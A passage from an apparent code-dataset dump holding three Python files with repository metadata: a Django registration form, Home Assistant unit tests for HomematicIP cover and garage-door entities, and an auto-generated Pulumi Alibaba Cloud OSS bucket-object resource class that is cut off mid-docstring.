| 27.285714 | 40 | 0.842932 | 26 | 191 | 5.884615 | 0.384615 | 0.509804 | 0.555556 | 0.326797 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125654 | 191 | 6 | 41 | 31.833333 | 0.916168 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
72617f40900ee6e4153ce0a9d6634fcf27d7bf84 | 224 | py | Python | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | 1 | 2019-12-21T12:42:08.000Z | 2019-12-21T12:42:08.000Z | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | 19 | 2020-06-05T20:17:14.000Z | 2021-09-29T23:39:28.000Z | accounts/forms.py | alaorneto/pratinhas | 699f9133fe952c767005c0a36d4531def836db8d | [
"MIT"
] | null | null | null | from django import forms
class RegisterForm(forms.Form):
username = forms.CharField(required=True, max_length=50)
email = forms.EmailField(required=True, max_length=75)
password = forms.CharField(required=True)
| 32 | 60 | 0.763393 | 29 | 224 | 5.827586 | 0.62069 | 0.213018 | 0.260355 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020619 | 0.133929 | 224 | 6 | 61 | 37.333333 | 0.850515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0.2 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 7 |
728d60d5501628439dd59c8d642e8bdb16d2348a | 8,350 | py | Python | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 23 | 2017-11-15T21:03:53.000Z | 2021-03-29T21:33:48.000Z | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 6 | 2021-02-08T20:59:36.000Z | 2022-03-12T00:52:11.000Z | tests/components/homematicip_cloud/test_cover.py | itewk/home-assistant | 769cf19052f8c9ef374d8ba8ae7705ccc7bf4cf4 | [
"Apache-2.0"
] | 10 | 2018-01-01T00:12:51.000Z | 2021-12-21T23:08:05.000Z | """Tests for HomematicIP Cloud cover."""
from homematicip.base.enums import DoorCommand, DoorState
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_CURRENT_TILT_POSITION,
DOMAIN as COVER_DOMAIN,
)
from homeassistant.components.homematicip_cloud import DOMAIN as HMIPC_DOMAIN
from homeassistant.const import STATE_CLOSED, STATE_OPEN
from homeassistant.setup import async_setup_component
from .helper import async_manipulate_test_data, get_and_check_entity_basics
async def test_manually_configured_platform(hass):
"""Test that we do not set up an access point."""
assert (
await async_setup_component(
hass, COVER_DOMAIN, {COVER_DOMAIN: {"platform": HMIPC_DOMAIN}}
)
is True
)
assert not hass.data.get(HMIPC_DOMAIN)
async def test_hmip_cover_shutter(hass, default_mock_hap):
"""Test HomematicipCoverShutte."""
entity_id = "cover.sofa_links"
entity_name = "Sofa links"
device_model = "HmIP-FBL"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == "closed"
assert ha_state.attributes["current_position"] == 0
assert ha_state.attributes["current_tilt_position"] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (0,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover",
"set_cover_position",
{"entity_id": entity_id, "position": "50"},
blocking=True,
)
assert len(hmip_device.mock_calls) == service_call_counter + 3
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (0.5,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0.5)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 50
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "close_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 5
assert hmip_device.mock_calls[-1][0] == "set_shutter_level"
assert hmip_device.mock_calls[-1][1] == (1,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 1)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 7
assert hmip_device.mock_calls[-1][0] == "set_shutter_stop"
assert hmip_device.mock_calls[-1][1] == ()
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", None)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
async def test_hmip_cover_slats(hass, default_mock_hap):
"""Test HomematicipCoverSlats."""
entity_id = "cover.sofa_links"
entity_name = "Sofa links"
device_model = "HmIP-FBL"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (0,)
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", 0)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 0)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 100
await hass.services.async_call(
"cover",
"set_cover_tilt_position",
{"entity_id": entity_id, "tilt_position": "50"},
blocking=True,
)
assert len(hmip_device.mock_calls) == service_call_counter + 4
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (0.5,)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 0.5)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 50
await hass.services.async_call(
"cover", "close_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 6
assert hmip_device.mock_calls[-1][0] == "set_slats_level"
assert hmip_device.mock_calls[-1][1] == (1,)
await async_manipulate_test_data(hass, hmip_device, "slatsLevel", 1)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
assert ha_state.attributes[ATTR_CURRENT_TILT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover_tilt", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 8
assert hmip_device.mock_calls[-1][0] == "set_shutter_stop"
assert hmip_device.mock_calls[-1][1] == ()
await async_manipulate_test_data(hass, hmip_device, "shutterLevel", None)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
async def test_hmip_garage_door_tormatic(hass, default_mock_hap):
"""Test HomematicipCoverShutte."""
entity_id = "cover.garage_door_module"
entity_name = "Garage Door Module"
device_model = "HmIP-MOD-TM"
ha_state, hmip_device = get_and_check_entity_basics(
hass, default_mock_hap, entity_id, entity_name, device_model
)
assert ha_state.state == "closed"
assert ha_state.attributes["current_position"] == 0
service_call_counter = len(hmip_device.mock_calls)
await hass.services.async_call(
"cover", "open_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 1
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.OPEN,)
await async_manipulate_test_data(hass, hmip_device, "doorState", DoorState.OPEN)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_OPEN
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 100
await hass.services.async_call(
"cover", "close_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 3
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.CLOSE,)
await async_manipulate_test_data(hass, hmip_device, "doorState", DoorState.CLOSED)
ha_state = hass.states.get(entity_id)
assert ha_state.state == STATE_CLOSED
assert ha_state.attributes[ATTR_CURRENT_POSITION] == 0
await hass.services.async_call(
"cover", "stop_cover", {"entity_id": entity_id}, blocking=True
)
assert len(hmip_device.mock_calls) == service_call_counter + 5
assert hmip_device.mock_calls[-1][0] == "send_door_command"
assert hmip_device.mock_calls[-1][1] == (DoorCommand.STOP,)
| 41.336634 | 86 | 0.722635 | 1,157 | 8,350 | 4.858254 | 0.089023 | 0.088952 | 0.089664 | 0.121687 | 0.86924 | 0.845223 | 0.845223 | 0.841131 | 0.825832 | 0.806084 | 0 | 0.01565 | 0.165868 | 8,350 | 201 | 87 | 41.542289 | 0.791386 | 0.004072 | 0 | 0.622754 | 0 | 0 | 0.100613 | 0.008333 | 0 | 0 | 0 | 0 | 0.401198 | 1 | 0 | false | 0 | 0.035928 | 0 | 0.035928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
72a1f90512c688c3ad6e9be62021090e17827b1f | 40,479 | py | Python | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 42 | 2019-03-18T06:34:37.000Z | 2022-03-24T07:08:57.000Z | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 152 | 2019-04-15T21:03:44.000Z | 2022-03-29T18:00:57.000Z | sdk/python/pulumi_alicloud/oss/bucket_object.py | pulumi/pulumi-alicloud | 9c34d84b4588a7c885c6bec1f03b5016e5a41683 | [
"ECL-2.0",
"Apache-2.0"
] | 3 | 2020-08-26T17:30:07.000Z | 2021-07-05T01:37:45.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['BucketObjectArgs', 'BucketObject']
@pulumi.input_type
class BucketObjectArgs:
def __init__(__self__, *,
bucket: pulumi.Input[str],
key: pulumi.Input[str],
acl: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a BucketObject resource.
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] expires: Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
"""
pulumi.set(__self__, "bucket", bucket)
pulumi.set(__self__, "key", key)
if acl is not None:
pulumi.set(__self__, "acl", acl)
if cache_control is not None:
pulumi.set(__self__, "cache_control", cache_control)
if content is not None:
pulumi.set(__self__, "content", content)
if content_disposition is not None:
pulumi.set(__self__, "content_disposition", content_disposition)
if content_encoding is not None:
pulumi.set(__self__, "content_encoding", content_encoding)
if content_md5 is not None:
pulumi.set(__self__, "content_md5", content_md5)
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if expires is not None:
pulumi.set(__self__, "expires", expires)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if server_side_encryption is not None:
pulumi.set(__self__, "server_side_encryption", server_side_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
@property
@pulumi.getter
def bucket(self) -> pulumi.Input[str]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: pulumi.Input[str]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@cache_control.setter
def cache_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_control", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> Optional[pulumi.Input[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@content_disposition.setter
def content_disposition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_disposition", value)
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> Optional[pulumi.Input[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@content_encoding.setter
def content_encoding(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_encoding", value)
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> Optional[pulumi.Input[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
"""
return pulumi.get(self, "content_md5")
@content_md5.setter
def content_md5(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_md5", value)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter
def expires(self) -> Optional[pulumi.Input[str]]:
"""
Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@expires.setter
def expires(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expires", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> Optional[pulumi.Input[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@server_side_encryption.setter
def server_side_encryption(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_side_encryption", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@pulumi.input_type
class _BucketObjectState:
def __init__(__self__, *,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_length: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
etag: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
version_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering BucketObject resources.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
:param pulumi.Input[str] content_disposition: Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_encoding: Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content_length: the content length of request.
:param pulumi.Input[str] content_md5: The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
:param pulumi.Input[str] content_type: A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
:param pulumi.Input[str] etag: the ETag generated for the object (an MD5 sum of the object content).
:param pulumi.Input[str] expires: Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] key: The name of the object once it is in the bucket.
:param pulumi.Input[str] kms_key_id: Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
:param pulumi.Input[str] server_side_encryption: Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
:param pulumi.Input[str] source: The path to the source file being uploaded to the bucket.
:param pulumi.Input[str] version_id: A unique version ID value for the object, if bucket versioning is enabled.
"""
if acl is not None:
pulumi.set(__self__, "acl", acl)
if bucket is not None:
pulumi.set(__self__, "bucket", bucket)
if cache_control is not None:
pulumi.set(__self__, "cache_control", cache_control)
if content is not None:
pulumi.set(__self__, "content", content)
if content_disposition is not None:
pulumi.set(__self__, "content_disposition", content_disposition)
if content_encoding is not None:
pulumi.set(__self__, "content_encoding", content_encoding)
if content_length is not None:
pulumi.set(__self__, "content_length", content_length)
if content_md5 is not None:
pulumi.set(__self__, "content_md5", content_md5)
if content_type is not None:
pulumi.set(__self__, "content_type", content_type)
if etag is not None:
pulumi.set(__self__, "etag", etag)
if expires is not None:
pulumi.set(__self__, "expires", expires)
if key is not None:
pulumi.set(__self__, "key", key)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if server_side_encryption is not None:
pulumi.set(__self__, "server_side_encryption", server_side_encryption)
if source is not None:
pulumi.set(__self__, "source", source)
if version_id is not None:
pulumi.set(__self__, "version_id", version_id)
@property
@pulumi.getter
def acl(self) -> Optional[pulumi.Input[str]]:
"""
The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
"""
return pulumi.get(self, "acl")
@acl.setter
def acl(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "acl", value)
@property
@pulumi.getter
def bucket(self) -> Optional[pulumi.Input[str]]:
"""
The name of the bucket to put the file in.
"""
return pulumi.get(self, "bucket")
@bucket.setter
def bucket(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "bucket", value)
@property
@pulumi.getter(name="cacheControl")
def cache_control(self) -> Optional[pulumi.Input[str]]:
"""
Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "cache_control")
@cache_control.setter
def cache_control(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cache_control", value)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The literal content being uploaded to the bucket.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter(name="contentDisposition")
def content_disposition(self) -> Optional[pulumi.Input[str]]:
"""
Specifies presentational information for the object. Read [RFC2616 Content-Disposition](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_disposition")
@content_disposition.setter
def content_disposition(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_disposition", value)
@property
@pulumi.getter(name="contentEncoding")
def content_encoding(self) -> Optional[pulumi.Input[str]]:
"""
Specifies what content encodings have been applied to the object and thus what decoding mechanisms must be applied to obtain the media-type referenced by the Content-Type header field. Read [RFC2616 Content-Encoding](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "content_encoding")
@content_encoding.setter
def content_encoding(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_encoding", value)
@property
@pulumi.getter(name="contentLength")
def content_length(self) -> Optional[pulumi.Input[str]]:
"""
the content length of request.
"""
return pulumi.get(self, "content_length")
@content_length.setter
def content_length(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_length", value)
@property
@pulumi.getter(name="contentMd5")
def content_md5(self) -> Optional[pulumi.Input[str]]:
"""
The MD5 value of the content. Read [MD5](https://www.alibabacloud.com/help/doc-detail/31978.htm) for computing method.
"""
return pulumi.get(self, "content_md5")
@content_md5.setter
def content_md5(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_md5", value)
@property
@pulumi.getter(name="contentType")
def content_type(self) -> Optional[pulumi.Input[str]]:
"""
A standard MIME type describing the format of the object data, e.g. application/octet-stream. All Valid MIME Types are valid for this input.
"""
return pulumi.get(self, "content_type")
@content_type.setter
def content_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content_type", value)
@property
@pulumi.getter
def etag(self) -> Optional[pulumi.Input[str]]:
"""
the ETag generated for the object (an MD5 sum of the object content).
"""
return pulumi.get(self, "etag")
@etag.setter
def etag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "etag", value)
@property
@pulumi.getter
def expires(self) -> Optional[pulumi.Input[str]]:
"""
Specifies expire date for the the request/response. Read [RFC2616 Expires](https://www.ietf.org/rfc/rfc2616.txt) for further details.
"""
return pulumi.get(self, "expires")
@expires.setter
def expires(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expires", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
The name of the object once it is in the bucket.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the primary key managed by KMS. This parameter is valid when the value of `server_side_encryption` is set to KMS.
"""
return pulumi.get(self, "kms_key_id")
@kms_key_id.setter
def kms_key_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_id", value)
@property
@pulumi.getter(name="serverSideEncryption")
def server_side_encryption(self) -> Optional[pulumi.Input[str]]:
"""
Specifies server-side encryption of the object in OSS. Valid values are `AES256`, `KMS`. Default value is `AES256`.
"""
return pulumi.get(self, "server_side_encryption")
@server_side_encryption.setter
def server_side_encryption(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "server_side_encryption", value)
@property
@pulumi.getter
def source(self) -> Optional[pulumi.Input[str]]:
"""
The path to the source file being uploaded to the bucket.
"""
return pulumi.get(self, "source")
@source.setter
def source(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "source", value)
@property
@pulumi.getter(name="versionId")
def version_id(self) -> Optional[pulumi.Input[str]]:
"""
A unique version ID value for the object, if bucket versioning is enabled.
"""
return pulumi.get(self, "version_id")
@version_id.setter
def version_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "version_id", value)
class BucketObject(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
acl: Optional[pulumi.Input[str]] = None,
bucket: Optional[pulumi.Input[str]] = None,
cache_control: Optional[pulumi.Input[str]] = None,
content: Optional[pulumi.Input[str]] = None,
content_disposition: Optional[pulumi.Input[str]] = None,
content_encoding: Optional[pulumi.Input[str]] = None,
content_md5: Optional[pulumi.Input[str]] = None,
content_type: Optional[pulumi.Input[str]] = None,
expires: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
server_side_encryption: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a resource to put a object(content or file) to a oss bucket.
## Example Usage
### Uploading a file to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
object_source = alicloud.oss.BucketObject("object-source",
bucket="your_bucket_name",
key="new_object_key",
source="path/to/file")
```
### Uploading a content to a bucket
```python
import pulumi
import pulumi_alicloud as alicloud
example = alicloud.oss.Bucket("example",
bucket="your_bucket_name",
acl="public-read")
object_content = alicloud.oss.BucketObject("object-content",
bucket=example.bucket,
key="new_object_key",
content="the content that you want to upload.")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] acl: The [canned ACL](https://www.alibabacloud.com/help/doc-detail/52284.htm) to apply. Defaults to "private".
:param pulumi.Input[str] bucket: The name of the bucket to put the file in.
:param pulumi.Input[str] cache_control: Specifies caching behavior along the request/reply chain. Read [RFC2616 Cache-Control](https://www.ietf.org/rfc/rfc2616.txt) for further details.
:param pulumi.Input[str] content: The literal content being uploaded to the bucket.
